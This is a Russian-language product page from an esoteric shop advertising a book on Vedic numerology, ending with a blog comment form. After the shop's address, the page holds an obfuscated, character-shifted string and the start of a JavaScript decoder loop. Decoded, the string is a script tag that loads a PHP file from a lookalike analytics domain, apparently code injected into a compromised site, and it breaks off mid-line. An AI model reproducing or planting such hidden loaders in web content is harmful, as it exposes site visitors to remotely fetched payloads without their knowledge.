Ведическая нумерология. Сокровенная наука самопосвященияАвтор: Видья Ананда, Равиндра Кумар
ISBN: 5-87383-016-9
Переплет:Мягкий
Год издания: 2006 год
Издатель: “Институт метафизики”
Цена : см. прайс-лист

Эзотерический магазин “Мистическая Гирлянда” представляет Вам книгу авторами которой являются : идья Ананда и Равиндра Кумар ”Ведическая нумерология. Сокровенная наука самопосвящения”

В данном практическом руководстве дается систематизированное, проверенное веками учение о влияниях энергии чисел и слов на судьбу, характер и способности человека. В книге подробно описаны отношения нумерологических вибраций с аюрведой, астрологией, тантрическими и ведическими психотехниками и практиками самореализации.

В этой энциклопедической по своему содержанию книге приводятся уникальные астрологические мантры, дается анализ санскрита как вселенского кода грядущих событий, исследуются взаимосвязи чисел с чакрами, драгоценными камнями и планетарными силами, проявляющимися в образах полубогов и иерархов. Ведическая нумерология, являясь одновременно предсказательной наукой, священной мистерией и искусством трансформации, открывает путь, ведущий к гармонии, процветанию и совершенству.

Материал книги основан на таких писаниях, как Гаруда Пурана, Агни Пурана, Шат-чакра-нирупани, Иогататтва-упанишад и других авторитетных трактатах по ведической и каббалистической системам нумерологии.

Книга предназначена для начинающих нумерологов, специалистов в области предсказательных наук и тайноведения, психологов, а также всех, кто устремлен к самопознанию и самосовершенствованию.

Приобрести данную книгу Вы можете посетив наш магазин магии по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>